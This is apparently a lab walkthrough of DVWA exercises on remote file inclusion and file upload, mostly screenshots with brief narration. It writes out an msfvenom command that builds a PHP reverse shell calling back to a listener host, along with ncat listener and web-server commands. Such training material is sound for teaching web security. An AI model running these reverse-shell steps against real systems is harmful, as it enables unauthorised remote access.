# DVWA Exercises 4

### 07 Remote Fileinclusion

Start a local webserver listening on port 8001

`python3 -m http.server 8001`

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FXFVT81SaA6G4BzdGnwJo%2Frfi01.png?alt=media\&token=f019df9f-8db9-4bd6-b78b-14be0ff760f2)

Start a ncat listener on port 8002

`ncat -lvnp 8002`

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FkZvICYBQPJDxGwbLihk2%2Frfi02.png?alt=media&#x26;token=f1699b7d-e016-49e4-b8bb-cc37f3940a77" alt=""></div>

Generate a php reverseshell with msfvenom

`msfvenom -p php/reverse_php LHOST="172.17.0.1" LPORT=8002 -f raw >shell.php`

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2Fgf8zkBNIWCAUNR76ssU2%2Frfi03.png?alt=media\&token=a0ff6970-a5be-4d4b-ac8e-02eb7b13e4ae)

First let's do a check if a remote target can be placed in the URL:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2Fp1zbqguVYNB91h3xjtHd%2Frfi04.png?alt=media&#x26;token=a2180bac-bba6-4f01-8577-16a82414f7fc" alt=""></div>

That seems to work! I can also see the http get request for test.php on my local webserver:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FIql30v7ymktoWuAe2SuG%2Frfi05.png?alt=media&#x26;token=c69d9fcf-e264-4793-8508-e9856f1a7708" alt=""></div>

And now let's execute the remoteshell:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F683yViEeel09lQkjlWQU%2Frfi07.png?alt=media&#x26;token=d6b3766f-ce96-44f8-8010-ce7630b11b4c" alt=""></div>

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2Flpok8IdSbXimYpibrUaN%2Frfi06.png?alt=media&#x26;token=54e4568e-a7ca-4f0d-a4ae-327aae20d1dc" alt=""></div>

### 08 File upload

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FDeRnDiziKXxzZ0E0dCbg%2Fupload01.png?alt=media&#x26;token=868b948e-eff0-46b8-8539-bb8004909d50" alt=""></div>

Php Reverseshell successfully uploaded

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FVDkWGsMNDaWnFZp08wWP%2Fupload02.png?alt=media&#x26;token=9ea9c25b-5f6f-4ddb-8e37-dd528ccc45c0" alt=""></div>

Let's try to execute the reverseshell

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F6RgVuUuzEk3KHhBX1Itm%2Fupload03.png?alt=media&#x26;token=3b110258-3d8b-4a36-8f52-8ac557ffb90d" alt=""></div>
